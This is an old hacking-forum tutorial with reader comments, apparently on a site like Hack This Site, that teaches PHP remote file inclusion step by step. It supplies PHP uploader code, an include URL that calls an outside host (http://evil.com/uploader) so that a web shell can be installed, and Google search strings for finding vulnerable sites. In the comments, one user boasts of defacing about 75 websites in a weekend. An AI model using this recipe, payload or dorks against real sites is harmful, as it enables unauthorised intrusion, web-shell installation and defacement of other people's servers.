Include Exploits
Include Exploits
In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.
When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.
e.g. http://www.abc.com/index.php?page=news
To test if its vulnerable, try changing it to abc or whatever
e.g. http://www.abc.com/index.php?page=abc
If its vulnerable you should get an error like this:
Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01
Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.
e.g. $page = $_GET ['page'] . ".php"; include ($page);
So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:
<?php
if ( $userfile ) { @$res=copy($userfile,"$userfile_name"); if ( !$res ){ print "Upload failed! \n"; }else{ print "Upload of $userfile_name successful \n"; } } ?>
<FORM method=POST ENCTYPE="multipart/form-data"> File to Upload <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000"> <INPUT NAME="userfile" TYPE="file" size=35> <INPUT TYPE="submit"> </FORM> </HTML>
So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net
So to exploit the page simply add your url for the uploader script:
e.g. http://www.abc.com/index.php?page=http://evil.com/uploader
Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.
To find vulnerable sites, we can use our best friend, google. Good searches include:
inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"
Be imaginative :)
Thanks for reading and i hope you've learnt something new.
Will.
ghost 18 years ago
Thats because the index.php file your exploiting doesnt have the permissions i think. Try making a script using fopen instead.
ghost 18 years ago
What article did you base this off of? I'm not accusing you of anything, just wondering if you were had read the article I posted to Rohitab and HTS a while back.
ghost 18 years ago
thousandtoone i based it on sheer experience, i havent read your article and apologise if you feel ive copied you. Ive never even heard of 'Rohitab' and have only ever been on HTS once. Was your article similar to mine?
ghost 18 years ago
WilleH, figured that was the case. Generally people don't try to reinvent the wheel so I thought you might've read this somewhere in the past. This article I wrote was one of my first major attempts at defacing.. Between this and finding two of my own vulnerabilities in PHP-Nuke, I must've defaced close to 75 websites in one weekend.
http://www.hackthissite.org/articles/read/285/2/30
ghost 18 years ago
You talk more about uploads whereas I discuss shell commands and general fopen attacks, but nonethess you can see where I imagined you might've seen my article. Fun stuff and good article!
ghost 18 years ago
there is one problem… most websites use it like this:
<?php $page=$_get['page']; $page_include="include/".$page; include($page_include); ?>
basicly, this means that if you use this exploit it will include include/http://evil.com/uploader.php instead of http://evil.com/uploader.php, so the file won't be found :(
ghost 18 years ago
Well, I found one. It's not to break down your article, its very good. Just said not much sites used it like that…
ghost 18 years ago
And, im not going to give you an example because no doubt it would get around and the server would get raped.
ghost 17 years ago
SkareCrow wrote a similar article, for those who still don't get it:
http://www.hellboundhackers.org/articlecomments.php?article_id=612